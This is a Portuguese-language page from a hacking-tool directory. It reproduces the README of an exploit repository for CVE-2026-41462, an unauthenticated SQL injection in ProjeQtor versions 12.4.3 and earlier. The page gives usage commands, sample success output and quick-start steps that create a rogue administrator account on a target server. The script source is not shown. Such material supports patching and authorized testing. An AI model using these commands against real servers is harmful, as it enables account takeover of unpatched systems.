Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-41462
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

Ver Repositório
13há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-41462 - Injeção SQL Não Autenticada no ProjeQtor

projeqtor_cover

Injeção SQL Crítica Não Autenticada no ProjeQtor ≤ 12.4.3

Critical CVSS 9.8 Unauthenticated

📌 Visão Geral

A CVE-2026-41462 é uma vulnerabilidade crítica de injeção SQL não autenticada na funcionalidade de login da ferramenta de gerenciamento de projetos ProjeQtor.

  • CVE ID: CVE-2026-41462
  • Versões Afetadas: ProjeQtor 7.0 a 12.4.3
  • Versão Corrigida: 12.4.4
  • Severidade: Crítica (CVSS 9.8)
  • Tipo: Injeção SQL Empilhada Não Autenticada

🛠️ Exploração

Uso

python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!

📊 O Que Você Verá Se Funcionar

Quando o exploit for bem-sucedido, você verá uma saída semelhante a esta:

[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

Após Executar o Exploit:

  1. Abra seu navegador e acesse:
    http://target.com/login.php

  2. Faça login usando as credenciais exibidas na saída do script.

  3. Se for bem-sucedido, você acessará o Painel de Administração do ProjeQtor com privilégios administrativos completos.

Indicadores de Sucesso:

  • Você pode visualizar todos os projetos, usuários e configurações do sistema
  • Você pode criar/editar/excluir projetos sem restrições
  • O novo usuário aparece na seção de gerenciamento de usuários

📁 Conteúdo do Repositório

ArquivoDescrição
CVE-2026-41462.pyScript principal de exploração
CVE-2026-41462.yamlModelo de detecção Nuclei
README.mdEsta documentação

🚀 Início Rápido

  1. Clone o repositório:

    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. Execute o exploit:

    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. Faça login com a conta de administrador recém-criada.


⚠️ Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e testes de penetração autorizados. O uso não autorizado é ilegal.


📄 Referências

  • NVD - CVE-2026-41462
  • Correção Oficial do ProjeQtor (v12.4.4+)

Divulgação Responsável • Somente Hacking Ético
Fique seguro. Teste legalmente.
Baixar ferramenta